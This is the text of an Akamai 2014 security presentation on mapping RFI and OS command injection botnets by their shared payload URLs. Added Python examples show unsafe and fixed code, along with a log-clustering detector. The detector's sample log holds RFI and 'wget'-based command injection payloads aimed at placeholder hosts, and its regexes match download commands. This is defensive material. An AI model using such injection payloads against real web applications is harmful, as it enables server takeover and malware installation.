Q4 2014 security report botnet profiling technique presentation


[Q4 2014]

akamai.com


= botnet profiling technique

• New analysis technique using data from the Akamai Intelligent Platform™
• Automate discovery of web application vulnerabilities for Remote File Inclusion (RFI) and OS Command Injection attacks
• Botnets profiled by identifying malicious code resource URLs and seemingly identical payloads
• Analysis does not require inclusion in the botnet or taking over the botnet’s command and control (C&C, C2) server

[Download the Q4 2014 Global DDoS Attack Report for supporting data and analysis]

2 / [The State of the Internet] / Security (Q4 2014)


= Remote File Inclusion (RFI) attacks

• Used to exploit dynamic file include mechanisms in web applications
• Web application can be tricked into including remote files with malicious code
• RFI vulnerabilities are easily found and exploited by attackers

    $dir = $_GET['module_name'];
    include($dir . "/function.php");

Figure 1: Code vulnerable to a Remote File Inclusion attack
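Figure 1 is PHP; the following is an added Python example (not from the Akamai report) that mirrors the same flaw and shows the usual fix: the request parameter selects a name from a fixed allow-list instead of supplying a path. MODULE_ROOT, ALLOWED_MODULES and the function names are constructed for this illustration, and looks_like_rfi is a detection-side check a log reviewer could apply to the same parameter.

```python
from pathlib import Path

# Constructed for this example: where modules live and which names are legitimate.
MODULE_ROOT = Path("/var/www/app/modules")
ALLOWED_MODULES = frozenset({"news", "users", "billing"})


def include_path_unsafe(module_name: str) -> str:
    """Same pattern as Figure 1: the request value is pasted into the include path
    unchanged, so a remote URL or a traversal sequence passes straight through."""
    return module_name + "/function.php"


def include_path_safe(module_name: str) -> Path:
    """The request chooses a name from the allow-list; it never supplies a path."""
    if module_name not in ALLOWED_MODULES:
        raise ValueError(f"unknown module: {module_name!r}")
    root = MODULE_ROOT.resolve()
    path = (root / module_name / "function.php").resolve()
    # Defence in depth: even an allow-listed name must resolve under MODULE_ROOT.
    if root not in path.parents:
        raise ValueError("module path escapes module root")
    return path


def looks_like_rfi(value: str) -> bool:
    """Detection-side check: a file-selection parameter carrying a remote scheme
    or a PHP stream wrapper is an RFI attempt, whether or not the include succeeded."""
    v = value.strip().lower()
    return v.startswith(("http://", "https://", "ftp://", "php://", "data:"))


if __name__ == "__main__":
    print(include_path_unsafe("http://example.invalid/evil.txt?"))  # passes through
    print(include_path_safe("news"))                                  # fixed location
    print(looks_like_rfi("http://example.invalid/evil.txt?"))        # True
```

The allow-list is the actual fix; the parents check only guards against a later refactor that lets file names into ALLOWED_MODULES. The trailing "?" on the remote URL in the usage line is the common trick that turns the appended "/function.php" into a query string, which is why the detection check keys on the scheme prefix rather than on the suffix.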



= OS Command Injection

• Used to execute unauthorized operating system commands
• The result of mixing trusted code with untrusted data
• Commands executed by the attacker run with the same privileges as the component that issues them
• Attackers can leverage this ability to gain access to, and damage, parts of the system that are not otherwise reachable
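The "trusted code mixed with untrusted data" point, as an added Python example that is not part of the report: the unsafe builder turns a request value into a shell command string, while the safe one validates the value as a hostname and hands the shell an argv list so no metacharacters are interpreted. The ping use case, the function names and the hostname pattern are constructed for this illustration.

```python
import re
import subprocess
from typing import List

# RFC 1123-style hostname: alphanumeric labels joined by dots, no spaces or
# shell metacharacters, and no leading '-' that argv parsing could read as an option.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def build_command_unsafe(host: str) -> str:
    """Trusted code mixed with untrusted data: the host value becomes part of a
    shell command line, so ';', '|', '&&' or backticks in it are executed."""
    return "ping -c 1 " + host


def build_command_safe(host: str) -> List[str]:
    """Validate first, then build an argv list. With shell=False the list goes to
    execve unchanged, so the host can only ever be one literal argument."""
    if not HOSTNAME_RE.match(host):
        raise ValueError(f"rejected host value: {host!r}")
    return ["ping", "-c", "1", host]


def run_ping(host: str) -> int:
    """Run the validated command without a shell and return its exit status."""
    result = subprocess.run(build_command_safe(host), capture_output=True, timeout=10)
    return result.returncode


if __name__ == "__main__":
    print(build_command_unsafe("localhost; echo injected"))  # metacharacters kept verbatim
    print(build_command_safe("example.com"))                  # ['ping', '-c', '1', 'example.com']
```

Two separate defences are at work: the argv list removes the shell from the picture, and the hostname check removes argument injection (a value such as "-f" would otherwise reach ping as an option). Detection of the unsafe pattern in logs looks for the same metacharacters inside parameter values that should never contain them.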



= common payloads in botnets

• RFI and OS Command Injection are among the most prevalent of vulnerabilities reported
• Attacker can take full control over the victim server
• The most favorable attack vector

• In recent months, Akamai has observed massively orchestrated attempts to find such vulnerabilities
• Botnet machines, even geographically disparate machines belonging to different organizations, try to inject the same remote piece of malicious code
• Code correlations enabled Akamai to map multiple Internet botnets operating at the time of the comparison
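The correlation idea described on this slide and on the first slide (group sources by the malicious code resource URL they inject), as an added Python example that is not Akamai's tooling. It parses constructed access-log lines, extracts the remote resource URL from both RFI parameter values and OS command injection values that fetch a file, normalizes it, and clusters source IPs by that URL; the log format, IP addresses, file names and the fetch-command pattern are all constructed for this illustration.

```python
import re
from collections import defaultdict
from typing import Dict, Iterator, List, Optional, Tuple
from urllib.parse import unquote, urlsplit

# Constructed access-log lines (combined-log style). Two RFI attempts and one
# command injection attempt reference the same resource; one references another.
SAMPLE_LOG = """\
198.51.100.7 - - [12/Nov/2014:09:15:01 +0000] "GET /index.php?module_name=http://203.0.113.5/bot.txt? HTTP/1.1" 200 512
203.0.113.22 - - [12/Nov/2014:09:15:03 +0000] "GET /app/?page=http://203.0.113.5/bot.txt?&x=1 HTTP/1.1" 200 512
192.0.2.9 - - [12/Nov/2014:09:15:05 +0000] "GET /cgi/status?host=localhost;wget%20http://203.0.113.5/bot.txt HTTP/1.1" 200 88
192.0.2.44 - - [12/Nov/2014:09:16:11 +0000] "GET /index.php?module_name=http://198.51.100.200/kit.txt HTTP/1.1" 200 512
203.0.113.50 - - [12/Nov/2014:09:17:30 +0000] "GET /index.php?module_name=news HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
REMOTE_URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
# A shell separator followed by a download command and a URL (constructed pattern).
CMD_FETCH_RE = re.compile(
    r"[;|&`$(]\s*(?:wget|curl|fetch|lwp-download)\s+(?:-\S+\s+)*((?:https?|ftp)://\S+)",
    re.IGNORECASE,
)


def query_values(target: str) -> Iterator[str]:
    """Yield decoded parameter values. Splitting on '&' only keeps ';' inside values,
    which parse_qsl on older Python versions would treat as a separator."""
    for field in urlsplit(target).query.split("&"):
        if "=" in field:
            yield unquote(field.split("=", 1)[1])


def normalize_resource(url: str) -> str:
    """Scheme, host and path only: the trailing '?' and query used in RFI payloads vary."""
    parts = urlsplit(url.strip())
    return f"{parts.scheme.lower()}://{parts.netloc.lower()}{parts.path or '/'}"


def classify_request(target: str) -> Optional[Tuple[str, str]]:
    """Return (vector, resource URL) for an RFI or command-injection attempt, else None."""
    for value in query_values(target):
        if REMOTE_URL_RE.match(value):
            return ("rfi", normalize_resource(value))
        m = CMD_FETCH_RE.search(value)
        if m:
            return ("cmdi", normalize_resource(m.group(1)))
    return None


def profile_botnets(log_text: str, min_sources: int = 2) -> Dict[str, List[str]]:
    """Cluster source IPs by the resource URL they inject. Both vectors share the key,
    so one botnet using RFI and command injection lands in one cluster."""
    clusters = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = classify_request(m.group("target"))
        if hit:
            clusters[hit[1]].add(m.group("src"))
    return {url: sorted(ips) for url, ips in clusters.items() if len(ips) >= min_sources}


if __name__ == "__main__":
    for resource, sources in profile_botnets(SAMPLE_LOG).items():
        print(resource, "<-", ", ".join(sources))
```

The min_sources threshold separates a coordinated campaign from a single scanner; on real data the next step is to enrich each cluster's sources with ASN and hosting-provider data, which is how the report's observation that the traffic came from SaaS and cloud providers would be reproduced.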



= botnet findings

• RFI and OS Command Injection botnets targeted more than 850 web applications across several top-level domains over a seven-day period
• All of the botnet traffic appeared to originate from compromised servers, most from popular Software-as-a-Service (SaaS) and cloud hosting providers
• The botnet Akamai analyzed included a dedicated Python script that performed web crawling disguised as a Microsoft Bing bot
• In one instance, an observed botnet propagated through two WordPress TimThumb vulnerabilities



= analysis of botnet capabilities

Both RFI and OS Command Injection attacks used the same malicious code involving:

• Remote shell command execution
• Remote file upload (see figure)
• SMS sending, controlled by IRC commands
• Local FTP server credentials brute force attack
• IRC-controlled UDP/TCP denial of service flood

Figure 2: Code for remote file upload



= conclusion

• Novel approach to understanding web application-layer botnets
• Used attack payload as the common denominator to aggregate data and map botnet information
• Does not require the researcher to be a part of the botnet or to take over the botnet’s C2 server
• Can be used for mapping other types of malicious activities that use a distinct payload



= Q4 2014 global attack report

• Download the Q4 2014 State of the Internet Security Report
• The Q4 2014 report covers:
  / Analysis of DDoS attack trends
  / Breakdown of average Gbps/Mbps statistics
  / Year-over-year and quarter-by-quarter analysis
  / Types and frequency of application-layer attacks
  / Types and frequency of infrastructure attacks
  / Trends in attack frequency, size and sources
  / Where and when DDoSers launch attacks
  / Case study and analysis



= about Prolexic

StateoftheInternet.com, brought to you by Akamai, serves as the home for content and information intended to provide an informed view into online connectivity and cybersecurity trends as well as related metrics, including Internet connection speeds, broadband adoption, mobile usage, outages, and cyber-attacks and threats.

Visitors to www.stateoftheinternet.com can find current and archived versions of Akamai’s State of the Internet (Connectivity and Security) reports, the company’s data visualizations, and other resources designed to put context around the ever-changing Internet landscape.


